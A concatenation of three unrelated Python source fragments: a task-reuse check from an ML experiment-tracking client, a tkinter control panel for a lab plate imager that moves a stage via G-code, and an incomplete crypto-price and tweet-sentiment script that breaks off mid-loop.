def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out i.e it was last use in the previous 24 hours.
2. It's name, project and type match the data in the server, so not
to override user changes made by using the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True, if the task is relevant for reuse. False, if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
if task_data.get('type') and \
task_data.get('type') not in (cls.TaskTypes.training, cls.TaskTypes.testing) and \
not Session.check_min_api_version(2.8):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(cls.TaskTypes.training, task_data['type'].value))
task_data['type'] = cls.TaskTypes.training
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
manual_frame.py
|
import tkinter as tk
from tkinter import ttk
import threading
import time
from PIL import Image, ImageTk
import sys
import gcodesender as gc
import os
# Constants the determine how far along each axis the imager will attempt to move. Should be set lower
# than the actual movement range, and should be adjusted each time the stop screws are changed.
maxX = 115
maxY = 125
maxZ = 100
class ManualFrame(tk.Frame):
"""Defines a tk.Frame containing all the widgets used in manual mode"""
def __init__(self, master):
"""Initializes all the widgets for the manual mode GUI"""
self.live = 0
self.x = 0
self.y = 0
self.z = 0
self.app = master.master
self.app.loading_screen.label.config(text="Creating Manual Frame...")
self.app.loading_screen.update()
#go_home(app_master.s)
time.sleep(2)
#set_height(self.s)
screen_width = self.app.screen_width
screen_height = self.app.screen_height
tk.Frame.__init__(self, master)
# Button Frame is the full height and 1/2 the width of the screen
# located in the bottom left corner
# Contains the plate selector, well selector, 'custom path' button,
# and 'GO' button
self.button_frame = tk.Frame(self, height=(screen_height), width=screen_width / 2, bg="#fff")
self.button_frame.grid_propagate(0)
self.button_frame.grid(row=3, column=0, rowspan=6, sticky=tk.SW)
# Video Frame is 7/9 the height and 1/2 the width of the screen
# located in the top right corner
# Contains live feed video as the imager works
self.video_height = (screen_height/9) * 6
self.video_width = (screen_width/2)
self.video_frame = tk.Frame(self, height=self.video_height, width=self.video_width, bg= "#111")
self.video_frame.grid_propagate(0)
self.video_frame.grid(row = 0, column = 1, rowspan = 7, sticky=tk.NE)
# Feedback frame is 2/9 the height and 1/2 the width of the screen
# loacted in the bottom right corner
# Contains the progress bar, 'Cancel' button, and output window
self.feedback_frame = tk.Frame(self, height=(screen_height/9)*3, width=screen_width/2, bg='#222')
self.feedback_frame.grid_propagate(0)
self.feedback_frame.grid(row = 7, column = 1, rowspan = 3, sticky=tk.SE)
self.progress_frame = tk.Frame(self.feedback_frame, height=self.feedback_frame.winfo_height(), width=(self.feedback_frame.winfo_width()/2), bg='#222')
self.progress_frame.grid_propagate(0)
self.progress_frame.grid(row=0, column=0, sticky=tk.W)
#---------------------------------------------------------------------------------------------------------------
xPad = screen_width/86
yPad = ((screen_height/9)*6)/126
style = ttk.Style()
style.configure("TButton", font=("Sans", "12"))
style.configure("Bold.TButton", font=("Sans", "12", "bold"), width=3)
style.configure("Italic.TButton", font=("Sans", "12", "bold"), width=4)
style.configure("TLabel", font=("Sans", "14"), background="#eeeeee")
style.configure("Bold.TLabel", relief="raised", borderwidth=5)
style.configure("TCombobox", font=("Sans", "14"))
style.configure("TCheckbutton", background="#eeeeee")
style.configure("TEntry", font=("Sans", "14"), height="14")
style.configure("TRadiobutton", font=("Sans", "12"), background="#eeeeee")
for i in range(28):
ttk.Label(self.button_frame, text="", background="white").grid(row=i, column=0, ipady=yPad, ipadx=xPad)
#ttk.Label(self.button_frame, text="", background="red").grid(row=i, column=19, ipady=yPad, ipadx=xPad)
for i in range(20):
ttk.Label(self.button_frame, text="", background="white").grid(row=0, column=i, ipady=yPad, ipadx=xPad)
#ttk.Label(self.button_frame, text="", background="red").grid(row=27, column=i, ipady=yPad, ipadx=xPad)
# Creates the background labels
plate_background = ttk.Label(self.button_frame, text= "", style="Bold.TLabel")
plate_background.grid(row=1, column=1, rowspan=5, columnspan=9, sticky=tk.N + tk.S + tk.E + tk.W)
settings_background = ttk.Label(self.button_frame, text="", style="Bold.TLabel")
settings_background.grid(row=1, column=11, rowspan=5, columnspan=8, sticky=tk.N + tk.S + tk.E + tk.W)
control_background = ttk.Label(self.button_frame, text="", style="Bold.TLabel")
control_background.grid(row=7, column=1, rowspan=19, columnspan=18, sticky=tk.N + tk.S + tk.E + tk.W)
# Creates the widgets for the frame
self.project = self.app.frames["AutoFrame"].project
self.project_entry = ttk.Entry(self.button_frame, textvariable=self.project, font=("Sans", "12"))
entry_label = ttk.Label(self.button_frame, text="*Project code: ")
entry_label.grid(row=21, column=9, columnspan=5, sticky=tk.E)
self.project_entry.grid(row=21, column=14, columnspan=6, sticky=tk.W)
self.target = self.app.frames["AutoFrame"].target
self.target_entry = ttk.Entry(self.button_frame, textvariable=self.target, font=("Sans", "12"))
target_label = ttk.Label(self.button_frame, text="*Target name: ")
target_label.grid(row=22, column=9, columnspan=5, sticky=tk.E)
self.target_entry.grid(row=22, column=14, columnspan=6, sticky=tk.W)
self.plate = self.app.frames["AutoFrame"].plate
self.plate_entry = ttk.Entry(self.button_frame, textvariable=self.plate, font=("Sans", "12"))
plate_label = ttk.Label(self.button_frame, text="*Plate name: ")
plate_label.grid(row=23, column=9, columnspan=5, sticky=tk.E)
self.plate_entry.grid(row=23, column=14, columnspan=6, sticky=tk.W)
self.date = self.app.frames["AutoFrame"].date
self.date_entry = ttk.Entry(self.button_frame, textvariable=self.date, font=("Sans", "12"))
date_label = ttk.Label(self.button_frame, text="*Prep date: ")
date_label.grid(row=24, column=9, columnspan=5, sticky=tk.E)
self.date_entry.grid(row=24, column=14, columnspan=6, sticky=tk.W)
warning_label = ttk.Label(self.button_frame, text= "(Must be 'yyyy-mm-dd' format)", font=("Sans", "12", "italic"))
warning_label.grid(row=25, column=10, columnspan=11, sticky=tk.N)
# Create the tray dropdown list and label
choices = ['Intelli-plate 96-3', 'Greiner 1536']
self.dropdown = ttk.Combobox(self.button_frame, textvariable=self.app.type, values=choices, state="readonly",
font=("Sans", "16"))
self.dropdown.bind("<<ComboboxSelected>>", self.app.frames["AutoFrame"].on_field_change)
ttk.Label(self.button_frame, text='Plate selection', font=("Sans", "14", "bold")).grid(row=1, column=3, columnspan=5)
self.dropdown.grid(row=2, column=1, columnspan=9, rowspan=2)
def load():
self.app.imager.load_tray()
self.app.open_plate_window()
self.load_button = ttk.Button(self.button_frame, text="Load new plate", command=load)
self.load_button.grid(row=4, column=2, columnspan=3)
def save():
threading.Thread(target=self.app.save_image, args=()).start()
self.camera_button = ttk.Button(self.button_frame, text="Save current image", command=save)
self.camera_button.grid(row = 8, column = 11, columnspan=9)
ttk.Label(self.button_frame, text="Settings", font=("Sans", "14", "bold")).grid(row=1, column=11, columnspan=8)
choices = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
slices = ttk.Combobox(self.button_frame, textvariable=self.app.slices, values=choices, state="readonly", width=3)
slices.grid(row=4, column=17, rowspan=2)
slice_label = ttk.Label(self.button_frame, text="Slices: ")
slice_label.grid(row=4, column=14, rowspan=2, columnspan=3, sticky=tk.E)
lightsVar = tk.IntVar(master)
self.lights_on_button = ttk.Radiobutton(self.button_frame, text="On", variable=lightsVar, value=1, command=self.app.arduino.lights_on)
self.lights_on_button.grid(row=2, column=13, sticky=tk.S)
self.lights_off_button = ttk.Radiobutton(self.button_frame, text="Off", variable=lightsVar, value=0, command=self.app.arduino.lights_off)
self.lights_off_button.grid(row=3, column=13, sticky=tk.N)
lights_label = ttk.Label(self.button_frame, text="Lights:")
lights_label.grid(row=2, column=11, rowspan =2, columnspan=2, sticky=tk.E)
#lightsVar.set(1) # Begin with lights on
filterVar = tk.IntVar(master)
self.green_filter_button = ttk.Radiobutton(self.button_frame, text="Green", variable=filterVar, value=1, command=self.app.arduino.servo_0) #servo_0
self.green_filter_button.grid(row=2, column=17, columnspan=2, sticky=tk.S + tk.W)
self.no_filter_button = ttk.Radiobutton(self.button_frame, text="None", variable=filterVar, value=0, command=self.app.arduino.servo_90) #servo_90
self.no_filter_button.grid(row=3, column=17, columnspan=2, sticky=tk.N + tk.W)
filter_label = ttk.Label(self.button_frame, text="Filter:")
filter_label.grid(row=2, column=14, rowspan=2, columnspan=3, sticky=tk.E)
filterVar.set(0)
laserVar = tk.IntVar(master)
self.laser_on_button = ttk.Radiobutton(self.button_frame, text="On", variable=laserVar, value=1, command=self.app.arduino.laser_on)
self.laser_on_button.grid(row=4, column=13, sticky=tk.S)
self.laser_off_button = ttk.Radiobutton(self.button_frame, text="Off", variable=laserVar, value=0, command=self.app.arduino.laser_off)
self.laser_off_button.grid(row=5, column=13, sticky=tk.N)
laser_label = ttk.Label(self.button_frame, text="Laser:")
laser_label.grid(row=4, column=11, columnspan=2, rowspan=2, sticky=tk.E)
laserVar.set(0)
self.calibrate_button = ttk.Button(self.button_frame, text="Calibrate", command=self.calibrate)
self.calibrate_button.grid(row = 4, column = 6, columnspan=3)
# Sliders for camera Temperature and Tint (don't seem to have any significant effect)
#self.temp_var = tk.StringVar(app_master)
#self.tint_var = tk.StringVar(app_master)
#temp, tint = (app_master.cam.get_temperature_tint())
#self.temp_var.set(temp)
#self.tint_var.set(tint)
#self.temp_entry = ttk.Entry(self.button_frame, textvariable = self.temp_var, width=5, font=("Sans", "12"))
#self.tint_entry = ttk.Entry(self.button_frame, textvariable = self.tint_var, width=5, font=("Sans", "12"))
#self.temp_entry.grid(row=19, column=4, columnspan=2, sticky=tk.W)
#self.tint_entry.grid(row=20, column=4, columnspan=2, sticky=tk.W)
#ttk.Label(self.button_frame, text="Temp: ").grid(row=19, column=1, columnspan=3, sticky=tk.E)
#ttk.Label(self.button_frame, text="Tint: ").grid(row=20, column=1, columnspan=3, sticky=tk.E)
#self.temp_scale = ttk.Scale(self.button_frame, from_=2000, to=15000, command=self.set_Temp)
#self.tint_scale = ttk.Scale(self.button_frame, from_=200, to=2500, command=self.set_Tint)
#self.temp_scale.grid(row=19, column=5, columnspan=3)
#self.tint_scale.grid(row=20, column=5, columnspan=3)
#self.temp_scale.set(int(float(self.temp_var.get())))
#self.tint_scale.set(int(float(self.tint_var.get())))
save_camera_button = ttk.Button(self.button_frame, text="Save camera settings", command=self.app.choose_cam_save_file)
save_camera_button.grid(row=20, column=2, columnspan=4)
load_camera_button = ttk.Button(self.button_frame, text="Load camera settings", command=self.app.choose_cam_load_file)
load_camera_button.grid(row=20, column=6, columnspan=4)
self.hue_var = tk.StringVar(self.app)
self.hue_var.set(self.app.cam.get_hue())
self.hue_entry = ttk.Entry(self.button_frame, textvariable = self.hue_var, width=5, font=("Sans", "12"))
self.hue_entry.grid(row = 21, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Hue: ").grid(row=21, column=1, columnspan=3, sticky=tk.E)
self.hue_scale = ttk.Scale(self.button_frame, from_=-180, to=180, command=self.set_Hue)
self.hue_scale.grid(row=21, column=5, columnspan=3)
self.hue_scale.set(int(float(self.hue_var.get())))
self.saturation_var = tk.StringVar(self.app)
self.saturation_var.set(self.app.cam.get_saturation())
self.saturation_entry = ttk.Entry(self.button_frame, textvariable = self.saturation_var, width=5, font=("Sans", "12"))
self.saturation_entry.grid(row = 22, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Saturation: ").grid(row=22, column=1, columnspan=3, sticky=tk.E)
self.saturation_scale = ttk.Scale(self.button_frame, from_=0, to=255, command=self.set_Saturation)
self.saturation_scale.grid(row=22, column=5, columnspan=3)
self.saturation_scale.set(int(float(self.saturation_var.get())))
self.brightness_var = tk.StringVar(self.app)
self.brightness_var.set(self.app.cam.get_brightness())
self.brightness_entry = ttk.Entry(self.button_frame, textvariable = self.brightness_var, width=5, font=("Sans", "12"))
self.brightness_entry.grid(row = 23, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Brightness: ").grid(row=23, column=1, columnspan=3, sticky=tk.E)
self.brightness_scale = ttk.Scale(self.button_frame, from_=-64, to = 64, command=self.set_Brightness)
self.brightness_scale.grid(row=23, column=5, columnspan=3)
self.brightness_scale.set(int(float(self.brightness_var.get())))
self.contrast_var = tk.StringVar(self.app)
self.contrast_var.set(self.app.cam.get_contrast())
self.contrast_entry = ttk.Entry(self.button_frame, textvariable = self.contrast_var, width=5, font=("Sans", "12"))
self.contrast_entry.grid(row=24, column = 4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Contrast: ").grid(row=24, column=1, columnspan=3, sticky=tk.E)
self.contrast_scale = ttk.Scale(self.button_frame, from_=-100, to=100, command = self.set_Contrast)
self.contrast_scale.grid(row=24, column=5, columnspan=3)
self.contrast_scale.set(int(float(self.contrast_var.get())))
self.gamma_var = tk.StringVar(self.app)
self.gamma_var.set(self.app.cam.get_gamma())
self.gamma_entry = ttk.Entry(self.button_frame, textvariable= self.gamma_var, width=5, font=("Sans", "12"))
self.gamma_entry.grid(row=25, column=4, columnspan=2, sticky=tk.W)
ttk.Label(self.button_frame, text="Gamma: ").grid(row=25, column=1, columnspan=3, sticky=tk.E)
self.gamma_scale = ttk.Scale(self.button_frame, from_=20, to=180, command=self.set_Gamma)
self.gamma_scale.grid(row=25, column=5, columnspan=3)
self.gamma_scale.set(int(float(self.gamma_var.get())))
self.quad_image = Image.open("util_images/quad_arrow.png")
self.quad_image = self.quad_image.resize((int(xPad*6), int(yPad*19)), Image.ANTIALIAS)
self.quad_image = ImageTk.PhotoImage(self.quad_image)
quad_arrow = ttk.Label(self.button_frame, image=self.quad_image)
quad_arrow.grid(row=13, column=5, rowspan=3, columnspan=3)
self.double_image = Image.open("util_images/double_arrow.png")
self.double_image = self.double_image.resize((int(xPad*2.5), int(yPad*19)), Image.ANTIALIAS)
self.double_image = ImageTk.PhotoImage(self.double_image)
double_arrow = ttk.Label(self.button_frame, image=self.double_image)
double_arrow.grid(row=13, column=14, rowspan=3, columnspan=2)
self.x_plus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.right_one_well, style="Bold.TButton")
self.x_plus_10_button.grid(row=14, column=10, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_plus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.x_plus_1, style="Bold.TButton")
self.x_plus_1_button.grid(row=14, column=9, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_plus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.x_plus_01, style="Bold.TButton")
self.x_plus_01_button.grid(row=14, column=8, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_minus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.x_minus_01, style="Bold.TButton")
self.x_minus_01_button.grid(row=14, column=4, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_minus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.x_minus_1, style="Bold.TButton")
self.x_minus_1_button.grid(row=14, column=3, sticky=tk.N + tk.S + tk.E + tk.W)
self.x_minus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.left_one_well, style="Bold.TButton")
self.x_minus_10_button.grid(row=14, column=2, sticky=tk.N + tk.S + tk.E + tk.W)
self.y_plus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.up_one_well, style="Bold.TButton")
self.y_plus_10_button.grid(row=10, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_plus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.y_plus_1, style="Bold.TButton")
self.y_plus_1_button.grid(row=11, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_plus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.y_plus_01, style="Bold.TButton")
self.y_plus_01_button.grid(row=12, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_minus_01_button = ttk.Button(self.button_frame, text="0.1", command=self.y_minus_01, style="Bold.TButton")
self.y_minus_01_button.grid(row=16, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_minus_1_button = ttk.Button(self.button_frame, text="1.0", command=self.y_minus_1, style="Bold.TButton")
self.y_minus_1_button.grid(row=17, column=5, columnspan=3, sticky=tk.N + tk.S)
self.y_minus_10_button = ttk.Button(self.button_frame, text="1 well", command=self.app.imager.down_one_well, style="Bold.TButton")
self.y_minus_10_button.grid(row=18, column=5, columnspan=3, sticky=tk.N + tk.S)
#z_plus_10_button = ttk.Button(self.button_frame, text="10", command = self.z_plus_10, style="Italic.TButton")
#z_plus_10_button.grid(row = 10, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_plus_1_button = ttk.Button(self.button_frame, text="1.0", command = self.z_plus_1, style="Italic.TButton")
self.z_plus_1_button.grid(row = 10, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_plus_01_button = ttk.Button(self.button_frame, text="0.1", command = self.z_plus_01, style="Italic.TButton")
self.z_plus_01_button.grid(row = 11, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_plus_001_button = ttk.Button(self.button_frame, text="0.01", command = self.z_plus_001, style="Italic.TButton")
self.z_plus_001_button.grid(row = 12, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_minus_001_button = ttk.Button(self.button_frame, text="0.01", command = self.z_minus_001, style="Italic.TButton")
self.z_minus_001_button.grid(row = 16, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_minus_01_button = ttk.Button(self.button_frame, text="0.1", command = self.z_minus_01, style="Italic.TButton")
self.z_minus_01_button.grid(row = 17, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.z_minus_1_button = ttk.Button(self.button_frame, text="1.0", command = self.z_minus_1, style="Italic.TButton")
self.z_minus_1_button.grid(row = 18, column = 14, columnspan=2, sticky=tk.N + tk.S)
#z_minus_10_button = ttk.Button(self.button_frame, text="10", command = self.z_minus_10, style="Italic.TButton")
#z_minus_10_button.grid(row = 20, column = 14, columnspan=2, sticky=tk.N + tk.S)
self.well = tk.StringVar(master)
self.well.set("H12-3")
self.well_entry = ttk.Entry(self.button_frame, textvariable=self.well, font=("Sans", "12"), width=7)
well_label = ttk.Label(self.button_frame, text="Enter well to view: ")
example_label = ttk.Label(self.button_frame, text="(must be 'A01-1' format)", font=("Sans", "12", "italic"))
self.goButton = ttk.Button(self.button_frame, text="Go to well", command=self.app.imager.find_single_well)
self.goButton.grid(row=8, column=8, columnspan=3, sticky=tk.W)
well_label.grid(row=8, column=1, columnspan=5, sticky=tk.E)
example_label.grid(row=9, column=2, columnspan=10, sticky=tk.N)
self.well_entry.grid(row=8, column=6, columnspan=2)
#---------------------------------------------------------------------------------------------------------------
self.output = tk.Text(self.feedback_frame, background='black', foreground='white', height=15,
font=("Sans", "12"))
# scroll = tk.Scrollbar(self.output, command=self.output.yview)
# scroll.grid(sticky=tk.E)
# self.output.config(yscrollcommand=scroll.set)
#sys.stdout = self.app.StdRedirector([self.output, master.master.frames["AutoFrame"].output])
#sys.stderr = self.app.StdRedirector([self.output, master.master.frames["AutoFrame"].output])
self.output.grid(row=0, column=1, rowspan=2)
self.video_screen = ttk.Label(self.video_frame, text='')
self.video_screen.grid(row=0, column=0)
def find_well(event):
self.app.imager.find_single_well()
self.well_entry.bind("<Return>", find_well)
def set_hue(event):
value = self.hue_var.get()
v = float(value)
v = int(v)
self.hue_scale.set(v)
self.hue_entry.bind("<Return>", set_hue)
def set_saturation(event):
value = self.saturation_var.get()
v = float(value)
v = int(v)
self.saturation_scale.set(v)
self.saturation_entry.bind("<Return>", set_saturation)
def set_brightness(event):
value = self.brightness_var.get()
v = float(value)
v = int(v)
self.brightness_scale.set(v)
self.brightness_entry.bind("<Return>", set_brightness)
def set_contrast(event):
value = self.contrast_var.get()
v = float(value)
v = int(v)
self.contrast_scale.set(v)
self.contrast_entry.bind("<Return>", set_contrast)
def set_gamma(event):
value = self.gamma_var.get()
v = float(value)
v = int(v)
self.gamma_scale.set(v)
self.gamma_entry.bind("<Return>", set_gamma)
# def set_temp(event):
# value = self.temp_var.get()
# v = float(value)
# v = int(v)
# self.temp_scale.set(v)
# self.temp_entry.bind("<Return>", set_temp)
# def set_tint(event):
# value = self.tint_var.get()
# v = float(value)
# v = int(v)
# self.tint_scale.set(v)
# self.tint_entry.bind("<Return>", set_tint)
self.app.loading_screen.progress.step(33)
self.app.loading_screen.update()
def save_camera_settings(self):
file = open("camera_config")
def x_plus_10(self):
currentX, currentY = self.app.imager.ping_location(self.master.master.s)
if currentX > maxX-10:
return
else:
gc.writeTemporary(currentX+10, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_plus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentX > maxX-1:
return
else:
gc.writeTemporary(currentX+1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_plus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentX > maxX-.1:
return
else:
gc.writeTemporary(currentX+.1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_minus_10(self):
currentX, currentY = self.app.imager.ping_location()
if currentX < 10:
return
else:
gc.writeTemporary(currentX-10, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_minus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentX < 1:
return
else:
gc.writeTemporary(currentX-1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def x_minus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentX < .1:
return
else:
gc.writeTemporary(currentX-.1, currentY)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_plus_10(self):
currentX, currentY = self.app.imager.ping_location()
if currentY > maxY-10:
return
else:
gc.writeTemporary(currentX, currentY+10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_plus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentY > maxY-1:
return
else:
gc.writeTemporary(currentX, currentY+1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_plus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentY > maxY-.1:
return
else:
gc.writeTemporary(currentX, currentY+.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_minus_10(self):
currentX, currentY = self.app.imager.ping_location()
if currentY < 10:
return
else:
gc.writeTemporary(currentX, currentY-10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_minus_1(self):
currentX, currentY = self.app.imager.ping_location()
if currentY < 1:
return
else:
gc.writeTemporary(currentX, currentY-1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def y_minus_01(self):
currentX, currentY = self.app.imager.ping_location()
if currentY <0.1:
return
else:
gc.writeTemporary(currentX, currentY-0.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_10(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-10:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_1(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_01(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-0.1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+0.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_plus_001(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ > maxZ-0.01:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ+0.01)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_10(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 10:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ-10)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_1(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ-1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_01(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 0.1:
return
else:
gc.writeTemporary(currentX, currentY, z=currentZ-0.1)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def z_minus_001(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if currentZ < 0.01:
return
else:
gc.writeTemporary(currentX, currentY, z = currentZ-0.01)
gc.sendGCode(self.app.s, "gcode/temp.gcode")
os.remove("gcode/temp.gcode")
self.app.imager.print_current_location()
def calibrate(self):
currentX, currentY, currentZ = self.app.imager.ping_location(z=True)
if self.master.master.type.get() == "Intelli-plate 96-3":
print("> Calibrated location of A01-1 for Intelli-plate 96-3")
print("> ")
initFile = open("96-3_init.txt", "w")
self.app.FIRST_X = currentX
initFile.write(str(currentX) + '\n')
self.app.FIRST_Y = currentY
initFile.write(str(currentY) + '\n')
self.app.FIRST_Z = currentZ
initFile.write(str(currentZ))
initFile.close()
def set_Hue(self, v):
v = float(v)
v = int(v)
self.hue_var.set(v)
self.app.cam.set_hue(v)
def set_Saturation(self, v):
v = float(v)
v = int(v)
self.saturation_var.set(v)
self.app.cam.set_saturation(v)
def set_Brightness(self, v):
v = float(v)
v = int(v)
self.brightness_var.set(v)
self.app.cam.set_brightness(v)
def set_Contrast(self, v):
v = float(v)
v = int(v)
self.contrast_var.set(v)
self.app.cam.set_contrast(v)
def set_Gamma(self, v):
v = float(v)
v = int(v)
self.gamma_var.set(v)
self.app.cam.set_gamma(v)
# def set_Temp(self, v):
# v = float(v)
# v = int(v)
# self.temp_var.set(v)
# v2 = self.tint_var.get()
# self.master.master.cam.set_temperature_tint(v, v2)
# def set_Tint(self, v):
# v = float(v)
# v = int(v)
# self.tint_var.set(v)
# v1 = self.temp_var.get()
# self.master.master.cam.set_temperature_tint(v1, v)
|
4-live.py
|
coin = 'OKEX:DOGE-ETH'
#seconds between requests
time_to_sleep = 30
#how long to keep listening in minutes
time_alive = 20
max_id = 1510238364283338752
resolution = '1' # Available values: 1, 5, 15, 30, 60, 'D', 'W', 'M'
#twitter paramters for live tweets
def get_query_params_live(search_term, max_id):
return {'query': search_term,
'since_id': max_id,
'max_results': max_results,
'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',
'user.fields': 'id,name,username,created_at,description,public_metrics,verified',
'next_token': {}}
resolution = '1' # Available values: 1, 5, 15, 30, 60, 'D', 'W', 'M'
def write_data(all_text):
data = finnhub_client.crypto_candles(coin, resolution, int(millis(minus_period(now(),to_period("T"+str(int((24*time_history)))+"H")))/1000), int(datetime.timestamp(datetime.now())))
if data['s'] =='ok' and len(data['s'])>0 and data['c'] != None and len(data['c'])>0:
c_live = data['c'][0]
h_live = data['h'][0]
l_live = data['l'][0]
o_live = data['o'][0]
v_live = data['v'][0]
global max_id
i = 0
for t in all_text:
id_live = int(t['id'])
try:
if float(t['id'])!=None and max_id < float(t['id']):
globals()['max_id'] = int(t['id'])
combined_live = analyze_line(cleanText(t['text']))
negative_live = 100*combined_live.get('neg')
neutral_live = 100*combined_live.get('neu')
compound_live = 100*combined_live.get('compound')
positive_live = 100*combined_live.get('pos')
dateTime_live = t['created_at'][:-1]+" NY"
retweet_count_live = t['public_metrics']['retweet_count']
text_live = t['text'].split('\n', 1)[0]
